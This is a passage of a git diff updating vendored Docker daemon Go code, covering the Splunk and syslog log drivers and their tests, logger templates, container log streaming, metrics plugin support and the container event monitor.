+	info := logger.Info{
+		Config: map[string]string{
+			splunkURLKey:   hec.URL(),
+			splunkTokenKey: hec.token,
+		},
+		ContainerID:        "containeriid",
+		ContainerName:      "/container_name",
+		ContainerImageID:   "contaimageid",
+		ContainerImageName: "container_image_name",
+	}
+
+	l, err := New(info)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	ctx, unblock := context.WithCancel(context.Background())
+	hec.withBlock(ctx)
+	defer unblock()
+
+	batchSendTimeout = 1 * time.Second
+
+	if err := l.Log(&logger.Message{}); err != nil {
+		t.Fatal(err)
+	}
+
+	done := make(chan struct{})
+	go func() {
+		l.Close()
+		close(done)
+	}()
+
+	select {
+	case <-time.After(60 * time.Second):
+		buf := make([]byte, 1e6)
+		buf = buf[:runtime.Stack(buf, true)]
+		t.Logf("STACK DUMP: \n\n%s\n\n", string(buf))
+		t.Fatal("timeout waiting for close to finish")
+	case <-done:
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go
index e508948280..a3a83ac103 100644
--- a/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go
@@ -1,13 +1,15 @@
-package splunk
+package splunk // import "github.com/docker/docker/daemon/logger/splunk"
 
 import (
 	"compress/gzip"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"io/ioutil"
 	"net"
 	"net/http"
+	"sync"
 	"testing"
 )
 
@@ -29,8 +31,10 @@ type HTTPEventCollectorMock struct {
 	tcpAddr     *net.TCPAddr
 	tcpListener *net.TCPListener
 
+	mu                  sync.Mutex
 	token               string
 	simulateServerError bool
+	blockingCtx         context.Context
 
 	test *testing.T
 
@@ -55,6 +59,18 @@ func NewHTTPEventCollectorMock(t *testing.T) *HTTPEventCollectorMock {
 		connectionVerified:  false}
 }
 
+func (hec *HTTPEventCollectorMock) simulateErr(b bool) {
+	hec.mu.Lock()
+	hec.simulateServerError = b
+	hec.mu.Unlock()
+}
+
+func (hec *HTTPEventCollectorMock) withBlock(ctx context.Context) {
+	hec.mu.Lock()
+	hec.blockingCtx = ctx
+	hec.mu.Unlock()
+}
+
 func (hec *HTTPEventCollectorMock) URL() string {
 	return "http://" + hec.tcpListener.Addr().String()
 }
@@ -72,7 +88,16 @@ func (hec *HTTPEventCollectorMock) ServeHTTP(writer http.ResponseWriter, request
 
 	hec.numOfRequests++
 
-	if hec.simulateServerError {
+	hec.mu.Lock()
+	simErr := hec.simulateServerError
+	ctx := hec.blockingCtx
+	hec.mu.Unlock()
+
+	if ctx != nil {
+		<-hec.blockingCtx.Done()
+	}
+
+	if simErr {
 		if request.Body != nil {
 			defer request.Body.Close()
 		}
diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go
index fb9e867ff5..94bdee364a 100644
--- a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go
+++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go
@@ -1,5 +1,5 @@
 // Package syslog provides the logdriver for forwarding server logs to syslog endpoints.
-package syslog
+package syslog // import "github.com/docker/docker/daemon/logger/syslog"
 
 import (
 	"crypto/tls"
@@ -14,11 +14,11 @@ import (
 
 	syslog "github.com/RackSec/srslog"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/daemon/logger"
 	"github.com/docker/docker/daemon/logger/loggerutils"
 	"github.com/docker/docker/pkg/urlutil"
 	"github.com/docker/go-connections/tlsconfig"
+	"github.com/sirupsen/logrus"
 )
 
 const (
@@ -68,18 +68,18 @@ func init() {
 func rfc5424formatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string {
 	timestamp := time.Now().Format(time.RFC3339)
 	pid := os.Getpid()
-	msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s",
+	msg := fmt.Sprintf("<%d>%d %s %s %s %d %s - %s",
 		p, 1, timestamp, hostname, tag, pid, tag, content)
 	return msg
 }
 
 // The timestamp field in rfc5424 is derived from rfc3339. Whereas rfc3339 makes allowances
-// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximium
+// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximum
 // resolution is limited to "TIME-SECFRAC" which is 6 (microsecond resolution)
 func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string {
 	timestamp := time.Now().Format("2006-01-02T15:04:05.999999Z07:00")
 	pid := os.Getpid()
-	msg := fmt.Sprintf("<%d>%d %s %s %s %d %s %s",
+	msg := fmt.Sprintf("<%d>%d %s %s %s %d %s - %s",
 		p, 1, timestamp, hostname, tag, pid, tag, content)
 	return msg
 }
@@ -87,30 +87,30 @@ func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, con
 // New creates a syslog logger using the configuration passed in on
 // the context. Supported context configuration variables are
 // syslog-address, syslog-facility, syslog-format.
-func New(ctx logger.Context) (logger.Logger, error) {
-	tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate)
+func New(info logger.Info) (logger.Logger, error) {
+	tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate)
 	if err != nil {
 		return nil, err
 	}
 
-	proto, address, err := parseAddress(ctx.Config["syslog-address"])
+	proto, address, err := parseAddress(info.Config["syslog-address"])
 	if err != nil {
 		return nil, err
 	}
 
-	facility, err := parseFacility(ctx.Config["syslog-facility"])
+	facility, err := parseFacility(info.Config["syslog-facility"])
 	if err != nil {
 		return nil, err
 	}
 
-	syslogFormatter, syslogFramer, err := parseLogFormat(ctx.Config["syslog-format"], proto)
+	syslogFormatter, syslogFramer, err := parseLogFormat(info.Config["syslog-format"], proto)
 	if err != nil {
 		return nil, err
 	}
 
 	var log *syslog.Writer
 	if proto == secureProto {
-		tlsConfig, tlsErr := parseTLSConfig(ctx.Config)
+		tlsConfig, tlsErr := parseTLSConfig(info.Config)
 		if tlsErr != nil {
 			return nil, tlsErr
 		}
@@ -132,10 +132,13 @@ func New(ctx logger.Context) (logger.Logger, error) {
 }
 
 func (s *syslogger) Log(msg *logger.Message) error {
-	if msg.Source == "stderr" {
-		return s.writer.Err(string(msg.Line))
+	line := string(msg.Line)
+	source := msg.Source
+	logger.PutMessage(msg)
+	if source == "stderr" {
+		return s.writer.Err(line)
 	}
-	return s.writer.Info(string(msg.Line))
+	return s.writer.Info(line)
 }
 
 func (s *syslogger) Close() error {
@@ -184,6 +187,7 @@ func ValidateLogOpt(cfg map[string]string) error {
 	for key := range cfg {
 		switch key {
 		case "env":
+		case "env-regex":
 		case "labels":
 		case "syslog-address":
 		case "syslog-facility":
diff --git a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go
index 501561064b..4631788fbb 100644
--- a/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go
@@ -1,4 +1,4 @@
-package syslog
+package syslog // import "github.com/docker/docker/daemon/logger/syslog"
 
 import (
 	"reflect"
diff --git a/vendor/github.com/docker/docker/daemon/logger/templates/templates.go b/vendor/github.com/docker/docker/daemon/logger/templates/templates.go
new file mode 100644
index 0000000000..ab76d0f1c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/templates/templates.go
@@ -0,0 +1,50 @@
+package templates // import "github.com/docker/docker/daemon/logger/templates"
+
+import (
+	"bytes"
+	"encoding/json"
+	"strings"
+	"text/template"
+)
+
+// basicFunctions are the set of initial
+// functions provided to every template.
+var basicFunctions = template.FuncMap{
+	"json": func(v interface{}) string {
+		buf := &bytes.Buffer{}
+		enc := json.NewEncoder(buf)
+		enc.SetEscapeHTML(false)
+		enc.Encode(v)
+		// Remove the trailing new line added by the encoder
+		return strings.TrimSpace(buf.String())
+	},
+	"split":    strings.Split,
+	"join":     strings.Join,
+	"title":    strings.Title,
+	"lower":    strings.ToLower,
+	"upper":    strings.ToUpper,
+	"pad":      padWithSpace,
+	"truncate": truncateWithLength,
+}
+
+// NewParse creates a new tagged template with the basic functions
+// and parses the given format.
+func NewParse(tag, format string) (*template.Template, error) {
+	return template.New(tag).Funcs(basicFunctions).Parse(format)
+}
+
+// padWithSpace adds whitespace to the input if the input is non-empty
+func padWithSpace(source string, prefix, suffix int) string {
+	if source == "" {
+		return source
+	}
+	return strings.Repeat(" ", prefix) + source + strings.Repeat(" ", suffix)
+}
+
+// truncateWithLength truncates the source string up to the length provided by the input
+func truncateWithLength(source string, length int) string {
+	if len(source) < length {
+		return source
+	}
+	return source[:length]
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go b/vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go
new file mode 100644
index 0000000000..25e7c88750
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/templates/templates_test.go
@@ -0,0 +1,19 @@
+package templates // import "github.com/docker/docker/daemon/logger/templates"
+
+import (
+	"bytes"
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestNewParse(t *testing.T) {
+	tm, err := NewParse("foo", "this is a {{ . }}")
+	assert.Check(t, err)
+
+	var b bytes.Buffer
+	assert.Check(t, tm.Execute(&b, "string"))
+	want := "this is a string"
+	assert.Check(t, is.Equal(want, b.String()))
+}
diff --git a/vendor/github.com/docker/docker/daemon/logs.go b/vendor/github.com/docker/docker/daemon/logs.go
index cc34b82083..37ca4caf63 100644
--- a/vendor/github.com/docker/docker/daemon/logs.go
+++ b/vendor/github.com/docker/docker/daemon/logs.go
@@ -1,123 +1,175 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"fmt"
-	"io"
+	"context"
 	"strconv"
 	"time"
 
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	containertypes "github.com/docker/docker/api/types/container"
 	timetypes "github.com/docker/docker/api/types/time"
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/daemon/logger"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/pkg/stdcopy"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
-// ContainerLogs hooks up a container's stdout and stderr streams
-// configured with the given struct.
-func (daemon *Daemon) ContainerLogs(ctx context.Context, containerName string, config *backend.ContainerLogsConfig, started chan struct{}) error {
+// ContainerLogs copies the container's log channel to the channel provided in
+// the config. If ContainerLogs returns an error, no messages have been copied.
+// and the channel will be closed without data.
+//
+// if it returns nil, the config channel will be active and return log
+// messages until it runs out or the context is canceled.
+func (daemon *Daemon) ContainerLogs(ctx context.Context, containerName string, config *types.ContainerLogsOptions) (messages <-chan *backend.LogMessage, isTTY bool, retErr error) {
+	lg := logrus.WithFields(logrus.Fields{
+		"module":    "daemon",
+		"method":    "(*Daemon).ContainerLogs",
+		"container": containerName,
+	})
+
+	if !(config.ShowStdout || config.ShowStderr) {
+		return nil, false, errdefs.InvalidParameter(errors.New("You must choose at least one stream"))
+	}
 	container, err := daemon.GetContainer(containerName)
 	if err != nil {
-		return err
+		return nil, false, err
 	}
 
-	if !(config.ShowStdout || config.ShowStderr) {
-		return fmt.Errorf("You must choose at least one stream")
+	if container.RemovalInProgress || container.Dead {
+		return nil, false, errdefs.Conflict(errors.New("can not get logs from container which is dead or marked for removal"))
 	}
 
-	cLog, err := daemon.getLogger(container)
+	if container.HostConfig.LogConfig.Type == "none" {
+		return nil, false, logger.ErrReadLogsNotSupported{}
+	}
+
+	cLog, cLogCreated, err := daemon.getLogger(container)
 	if err != nil {
-		return err
+		return nil, false, err
 	}
+	if cLogCreated {
+		defer func() {
+			if retErr != nil {
+				if err = cLog.Close(); err != nil {
+					logrus.Errorf("Error closing logger: %v", err)
+				}
+			}
+		}()
+	}
+
 	logReader, ok := cLog.(logger.LogReader)
 	if !ok {
-		return logger.ErrReadLogsNotSupported
+		return nil, false, logger.ErrReadLogsNotSupported{}
 	}
 
-	follow := config.Follow && container.IsRunning()
+	follow := config.Follow && !cLogCreated
 	tailLines, err := strconv.Atoi(config.Tail)
 	if err != nil {
 		tailLines = -1
 	}
 
-	logrus.Debug("logs: begin stream")
-
 	var since time.Time
 	if config.Since != "" {
 		s, n, err := timetypes.ParseTimestamps(config.Since, 0)
 		if err != nil {
-			return err
+			return nil, false, err
 		}
 		since = time.Unix(s, n)
 	}
+
+	var until time.Time
+	if config.Until != "" && config.Until != "0" {
+		s, n, err := timetypes.ParseTimestamps(config.Until, 0)
+		if err != nil {
+			return nil, false, err
+		}
+		until = time.Unix(s, n)
+	}
+
 	readConfig := logger.ReadConfig{
 		Since:  since,
+		Until:  until,
 		Tail:   tailLines,
 		Follow: follow,
 	}
+
 	logs := logReader.ReadLogs(readConfig)
 
-	wf := ioutils.NewWriteFlusher(config.OutStream)
-	defer wf.Close()
-	close(started)
-	wf.Flush()
-
-	var outStream io.Writer
-	outStream = wf
-	errStream := outStream
-	if !container.Config.Tty {
-		errStream = stdcopy.NewStdWriter(outStream, stdcopy.Stderr)
-		outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout)
-	}
-
-	for {
-		select {
-		case err := <-logs.Err:
-			logrus.Errorf("Error streaming logs: %v", err)
-			return nil
-		case <-ctx.Done():
-			logs.Close()
-			return nil
-		case msg, ok := <-logs.Msg:
-			if !ok {
-				logrus.Debug("logs: end stream")
-				logs.Close()
-				if cLog != container.LogDriver {
-					// Since the logger isn't cached in the container, which occurs if it is running, it
-					// must get explicitly closed here to avoid leaking it and any file handles it has.
-					if err := cLog.Close(); err != nil {
-						logrus.Errorf("Error closing logger: %v", err)
-					}
+	// past this point, we can't possibly return any errors, so we can just
+	// start a goroutine and return to tell the caller not to expect errors
+	// (if the caller wants to give up on logs, they have to cancel the context)
+	// this goroutine functions as a shim between the logger and the caller.
+	messageChan := make(chan *backend.LogMessage, 1)
+	go func() {
+		if cLogCreated {
+			defer func() {
+				if err = cLog.Close(); err != nil {
+					logrus.Errorf("Error closing logger: %v", err)
+				}
+			}()
+		}
+		// set up some defers
+		defer logs.Close()
+
+		// close the messages channel. closing is the only way to signal above
+		// that we're doing with logs (other than context cancel i guess).
+		defer close(messageChan)
+
+		lg.Debug("begin logs")
+		for {
+			select {
+			// i do not believe as the system is currently designed any error
+			// is possible, but we should be prepared to handle it anyway. if
+			// we do get an error, copy only the error field to a new object so
+			// we don't end up with partial data in the other fields
+			case err := <-logs.Err:
+				lg.Errorf("Error streaming logs: %v", err)
+				select {
+				case <-ctx.Done():
+				case messageChan <- &backend.LogMessage{Err: err}:
+				}
+				return
+			case <-ctx.Done():
+				lg.Debugf("logs: end stream, ctx is done: %v", ctx.Err())
+				return
+			case msg, ok := <-logs.Msg:
+				// there is some kind of pool or ring buffer in the logger that
+				// produces these messages, and a possible future optimization
+				// might be to use that pool and reuse message objects
+				if !ok {
+					lg.Debug("end logs")
+					return
+				}
+				m := msg.AsLogMessage() // just a pointer conversion, does not copy data
+
+				// there could be a case where the reader stops accepting
+				// messages and the context is canceled. we need to check that
+				// here, or otherwise we risk blocking forever on the message
+				// send.
+				select {
+				case <-ctx.Done():
+					return
+				case messageChan <- m:
 				}
-				return nil
-			}
-			logLine := msg.Line
-			if config.Details {
-				logLine = append([]byte(msg.Attrs.String()+" "), logLine...)
-			}
-			if config.Timestamps {
-				logLine = append([]byte(msg.Timestamp.Format(logger.TimeFormat)+" "), logLine...)
-			}
-			if msg.Source == "stdout" && config.ShowStdout {
-				outStream.Write(logLine)
-			}
-			if msg.Source == "stderr" && config.ShowStderr {
-				errStream.Write(logLine)
 			}
 		}
-	}
+	}()
+	return messageChan, container.Config.Tty, nil
 }
 
-func (daemon *Daemon) getLogger(container *container.Container) (logger.Logger, error) {
-	if container.LogDriver != nil && container.IsRunning() {
-		return container.LogDriver, nil
+func (daemon *Daemon) getLogger(container *container.Container) (l logger.Logger, created bool, err error) {
+	container.Lock()
+	if container.State.Running {
+		l = container.LogDriver
 	}
-	return container.StartLogger(container.HostConfig.LogConfig)
+	container.Unlock()
+	if l == nil {
+		created = true
+		l, err = container.StartLogger()
+	}
+	return
 }
 
 // mergeLogConfig merges the daemon log config to the container's log config if the container's log driver is not specified.
@@ -140,3 +192,18 @@ func (daemon *Daemon) mergeAndVerifyLogConfig(cfg *containertypes.LogConfig) err
 
 	return logger.ValidateLogOpts(cfg.Type, cfg.Config)
 }
+
+func (daemon *Daemon) setupDefaultLogConfig() error {
+	config := daemon.configStore
+	if len(config.LogConfig.Config) > 0 {
+		if err := logger.ValidateLogOpts(config.LogConfig.Type, config.LogConfig.Config); err != nil {
+			return errors.Wrap(err, "failed to set log opts")
+		}
+	}
+	daemon.defaultLogConfig = containertypes.LogConfig{
+		Type:   config.LogConfig.Type,
+		Config: config.LogConfig.Config,
+	}
+	logrus.Debugf("Using default logging driver %s", daemon.defaultLogConfig.Type)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logs_test.go b/vendor/github.com/docker/docker/daemon/logs_test.go
index 0c36299e09..a32691a80c 100644
--- a/vendor/github.com/docker/docker/daemon/logs_test.go
+++ b/vendor/github.com/docker/docker/daemon/logs_test.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/daemon/metrics.go b/vendor/github.com/docker/docker/daemon/metrics.go
index 69dbfd9378..f6961a3553 100644
--- a/vendor/github.com/docker/docker/daemon/metrics.go
+++ b/vendor/github.com/docker/docker/daemon/metrics.go
@@ -1,16 +1,29 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
-import "github.com/docker/go-metrics"
+import (
+	"sync"
+
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/plugins"
+	"github.com/docker/go-metrics"
+	"github.com/pkg/errors"
+	"github.com/prometheus/client_golang/prometheus"
+	"github.com/sirupsen/logrus"
+)
+
+const metricsPluginType = "MetricsCollector"
 
 var (
 	containerActions          metrics.LabeledTimer
-	imageActions              metrics.LabeledTimer
 	networkActions            metrics.LabeledTimer
-	engineVersion             metrics.LabeledGauge
+	engineInfo                metrics.LabeledGauge
 	engineCpus                metrics.Gauge
 	engineMemory              metrics.Gauge
 	healthChecksCounter       metrics.Counter
 	healthChecksFailedCounter metrics.Counter
+
+	stateCtr *stateCounter
 )
 
 func init() {
@@ -25,18 +38,155 @@ func init() {
 	} {
 		containerActions.WithValues(a).Update(0)
 	}
+
 	networkActions = ns.NewLabeledTimer("network_actions", "The number of seconds it takes to process each network action", "action")
-	engineVersion = ns.NewLabeledGauge("engine", "The version and commit information for the engine process", metrics.Unit("info"),
+	engineInfo = ns.NewLabeledGauge("engine", "The information related to the engine and the OS it is running on", metrics.Unit("info"),
 		"version",
 		"commit",
 		"architecture",
-		"graph_driver", "kernel",
-		"os",
+		"graphdriver",
+		"kernel", "os",
+		"os_type",
+		"daemon_id", // ID is a randomly generated unique identifier (e.g. UUID4)
 	)
 	engineCpus = ns.NewGauge("engine_cpus", "The number of cpus that the host system of the engine has", metrics.Unit("cpus"))
 	engineMemory = ns.NewGauge("engine_memory", "The number of bytes of memory that the host system of the engine has", metrics.Bytes)
 	healthChecksCounter = ns.NewCounter("health_checks", "The total number of health checks")
 	healthChecksFailedCounter = ns.NewCounter("health_checks_failed", "The total number of failed health checks")
-	imageActions = ns.NewLabeledTimer("image_actions", "The number of seconds it takes to process each image action", "action")
+
+	stateCtr = newStateCounter(ns.NewDesc("container_states", "The count of containers in various states", metrics.Unit("containers"), "state"))
+	ns.Add(stateCtr)
+
 	metrics.Register(ns)
 }
+
+type stateCounter struct {
+	mu     sync.Mutex
+	states map[string]string
+	desc   *prometheus.Desc
+}
+
+func newStateCounter(desc *prometheus.Desc) *stateCounter {
+	return &stateCounter{
+		states: make(map[string]string),
+		desc:   desc,
+	}
+}
+
+func (ctr *stateCounter) get() (running int, paused int, stopped int) {
+	ctr.mu.Lock()
+	defer ctr.mu.Unlock()
+
+	states := map[string]int{
+		"running": 0,
+		"paused":  0,
+		"stopped": 0,
+	}
+	for _, state := range ctr.states {
+		states[state]++
+	}
+	return states["running"], states["paused"], states["stopped"]
+}
+
+func (ctr *stateCounter) set(id, label string) {
+	ctr.mu.Lock()
+	ctr.states[id] = label
+	ctr.mu.Unlock()
+}
+
+func (ctr *stateCounter) del(id string) {
+	ctr.mu.Lock()
+	delete(ctr.states, id)
+	ctr.mu.Unlock()
+}
+
+func (ctr *stateCounter) Describe(ch chan<- *prometheus.Desc) {
+	ch <- ctr.desc
+}
+
+func (ctr *stateCounter) Collect(ch chan<- prometheus.Metric) {
+	running, paused, stopped := ctr.get()
+	ch <- prometheus.MustNewConstMetric(ctr.desc, prometheus.GaugeValue, float64(running), "running")
+	ch <- prometheus.MustNewConstMetric(ctr.desc, prometheus.GaugeValue, float64(paused), "paused")
+	ch <- prometheus.MustNewConstMetric(ctr.desc, prometheus.GaugeValue, float64(stopped), "stopped")
+}
+
+func (d *Daemon) cleanupMetricsPlugins() {
+	ls := d.PluginStore.GetAllManagedPluginsByCap(metricsPluginType)
+	var wg sync.WaitGroup
+	wg.Add(len(ls))
+
+	for _, plugin := range ls {
+		p := plugin
+		go func() {
+			defer wg.Done()
+
+			adapter, err := makePluginAdapter(p)
+			if err != nil {
+				logrus.WithError(err).WithField("plugin", p.Name()).Error("Error creating metrics plugin adapater")
+				return
+			}
+			if err := adapter.StopMetrics(); err != nil {
+				logrus.WithError(err).WithField("plugin", p.Name()).Error("Error stopping plugin metrics collection")
+			}
+		}()
+	}
+	wg.Wait()
+
+	if d.metricsPluginListener != nil {
+		d.metricsPluginListener.Close()
+	}
+}
+
+type metricsPlugin interface {
+	StartMetrics() error
+	StopMetrics() error
+}
+
+func makePluginAdapter(p plugingetter.CompatPlugin) (metricsPlugin, error) { // nolint: interfacer
+	if pc, ok := p.(plugingetter.PluginWithV1Client); ok {
+		return &metricsPluginAdapter{pc.Client(), p.Name()}, nil
+	}
+
+	pa, ok := p.(plugingetter.PluginAddr)
+	if !ok {
+		return nil, errdefs.System(errors.Errorf("got unknown plugin type %T", p))
+	}
+
+	if pa.Protocol() != plugins.ProtocolSchemeHTTPV1 {
+		return nil, errors.Errorf("plugin protocol not supported: %s", pa.Protocol())
+	}
+
+	addr := pa.Addr()
+	client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, pa.Timeout())
+	if err != nil {
+		return nil, errors.Wrap(err, "error creating metrics plugin client")
+	}
+	return &metricsPluginAdapter{client, p.Name()}, nil
+}
+
+type metricsPluginAdapter struct {
+	c    *plugins.Client
+	name string
+}
+
+func (a *metricsPluginAdapter) StartMetrics() error {
+	type metricsPluginResponse struct {
+		Err string
+	}
+	var res metricsPluginResponse
+	if err := a.c.Call(metricsPluginType+".StartMetrics", nil, &res); err != nil {
+		return errors.Wrap(err, "could not start metrics plugin")
+	}
+	if res.Err != "" {
+		return errors.New(res.Err)
+	}
+	return nil
+}
+
+func (a *metricsPluginAdapter) StopMetrics() error {
+	if err := a.c.Call(metricsPluginType+".StopMetrics", nil, nil); err != nil {
+		return errors.Wrap(err, "error stopping metrics collector")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/metrics_unix.go b/vendor/github.com/docker/docker/daemon/metrics_unix.go
new file mode 100644
index 0000000000..452424e685
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/metrics_unix.go
@@ -0,0 +1,60 @@
+// +build !windows
+
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"net"
+	"net/http"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/plugins"
+	"github.com/docker/docker/plugin"
+	"github.com/docker/go-metrics"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
+)
+
+func (daemon *Daemon) listenMetricsSock() (string, error) {
+	path := filepath.Join(daemon.configStore.ExecRoot, "metrics.sock")
+	unix.Unlink(path)
+	l, err := net.Listen("unix", path)
+	if err != nil {
+		return "", errors.Wrap(err, "error setting up metrics plugin listener")
+	}
+
+	mux := http.NewServeMux()
+	mux.Handle("/metrics", metrics.Handler())
+	go func() {
+		http.Serve(l, mux)
+	}()
+	daemon.metricsPluginListener = l
+	return path, nil
+}
+
+func registerMetricsPluginCallback(store *plugin.Store, sockPath string) {
+	store.RegisterRuntimeOpt(metricsPluginType, func(s *specs.Spec) {
+		f := plugin.WithSpecMounts([]specs.Mount{
+			{Type: "bind", Source: sockPath, Destination: "/run/docker/metrics.sock", Options: []string{"bind", "ro"}},
+		})
+		f(s)
+	})
+	store.Handle(metricsPluginType, func(name string, client *plugins.Client) {
+		// Use lookup since nothing in the system can really reference it, no need
+		// to protect against removal
+		p, err := store.Get(name, metricsPluginType, plugingetter.Lookup)
+		if err != nil {
+			return
+		}
+
+		adapter, err := makePluginAdapter(p)
+		if err != nil {
+			logrus.WithError(err).WithField("plugin", p.Name()).Error("Error creating plugin adapater")
+		}
+		if err := adapter.StartMetrics(); err != nil {
+			logrus.WithError(err).WithField("plugin", p.Name()).Error("Error starting metrics collector plugin")
+		}
+	})
+}
diff --git a/vendor/github.com/docker/docker/daemon/metrics_unsupported.go b/vendor/github.com/docker/docker/daemon/metrics_unsupported.go
new file mode 100644
index 0000000000..653c77fc32
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/metrics_unsupported.go
@@ -0,0 +1,12 @@
+// +build windows
+
+package daemon // import "github.com/docker/docker/daemon"
+
+import "github.com/docker/docker/pkg/plugingetter"
+
+func registerMetricsPluginCallback(getter plugingetter.PluginGetter, sockPath string) {
+}
+
+func (daemon *Daemon) listenMetricsSock() (string, error) {
+	return "", nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/monitor.go b/vendor/github.com/docker/docker/daemon/monitor.go
index ee0d1fcce0..5e740dd4fe 100644
--- a/vendor/github.com/docker/docker/daemon/monitor.go
+++ b/vendor/github.com/docker/docker/daemon/monitor.go
@@ -1,132 +1,212 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"errors"
 	"fmt"
 	"runtime"
 	"strconv"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/container"
 	"github.com/docker/docker/libcontainerd"
 	"github.com/docker/docker/restartmanager"
+	"github.com/sirupsen/logrus"
 )
 
-// StateChanged updates daemon state changes from containerd
-func (daemon *Daemon) StateChanged(id string, e libcontainerd.StateInfo) error {
-	c := daemon.containers.Get(id)
-	if c == nil {
+func (daemon *Daemon) setStateCounter(c *container.Container) {
+	switch c.StateString() {
+	case "paused":
+		stateCtr.set(c.ID, "paused")
+	case "running":
+		stateCtr.set(c.ID, "running")
+	default:
+		stateCtr.set(c.ID, "stopped")
+	}
+}
+
+// ProcessEvent is called by libcontainerd whenever an event occurs
+func (daemon *Daemon) ProcessEvent(id string, e libcontainerd.EventType, ei libcontainerd.EventInfo) error {
+	c, err := daemon.GetContainer(id)
+	if c == nil || err != nil {
 		return fmt.Errorf("no such container: %s", id)
 	}
 
-	switch e.State {
-	case libcontainerd.StateOOM:
+	switch e {
+	case libcontainerd.EventOOM:
 		// StateOOM is Linux specific and should never be hit on Windows
 		if runtime.GOOS == "windows" {
-			return errors.New("Received StateOOM from libcontainerd on Windows. This should never happen.")
+			return errors.New("received StateOOM from libcontainerd on Windows. This should never happen")
 		}
+
+		c.Lock()
+		defer c.Unlock()
 		daemon.updateHealthMonitor(c)
+		if err := c.CheckpointTo(daemon.containersReplica); err != nil {
+			return err
+		}
+
 		daemon.LogContainerEvent(c, "oom")
-	case libcontainerd.StateExit:
-		// if container's AutoRemove flag is set, remove it after clean up
-		autoRemove := func() {
-			if c.HostConfig.AutoRemove {
-				if err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil {
-					logrus.Errorf("can't remove container %s: %v", c.ID, err)
-				}
+	case libcontainerd.EventExit:
+		if int(ei.Pid) == c.Pid {
+			c.Lock()
+			_, _, err := daemon.containerd.DeleteTask(context.Background(), c.ID)
+			if err != nil {
+				logrus.WithError(err).Warnf("failed to delete container %s from containerd", c.ID)
 			}
-		}
 
-		c.Lock()
-		c.StreamConfig.Wait()
-		c.Reset(false)
+			c.StreamConfig.Wait()
+			c.Reset(false)
 
-		restart, wait, err := c.RestartManager().ShouldRestart(e.ExitCode, false, time.Since(c.StartedAt))
-		if err == nil && restart {
-			c.RestartCount++
-			c.SetRestarting(platformConstructExitStatus(e))
-		} else {
-			c.SetStopped(platformConstructExitStatus(e))
-			defer autoRemove()
-		}
+			exitStatus := container.ExitStatus{
+				ExitCode:  int(ei.ExitCode),
+				ExitedAt:  ei.ExitedAt,
+				OOMKilled: ei.OOMKilled,
+			}
+			restart, wait, err := c.RestartManager().ShouldRestart(ei.ExitCode, daemon.IsShuttingDown() || c.HasBeenManuallyStopped, time.Since(c.StartedAt))
+			if err == nil && restart {
+				c.RestartCount++
+				c.SetRestarting(&exitStatus)
+			} else {
+				if ei.Error != nil {
+					c.SetError(ei.Error)
+				}
+				c.SetStopped(&exitStatus)
+				defer daemon.autoRemove(c)
+			}
+			defer c.Unlock() // needs to be called before autoRemove
 
-		daemon.updateHealthMonitor(c)
-		attributes := map[string]string{
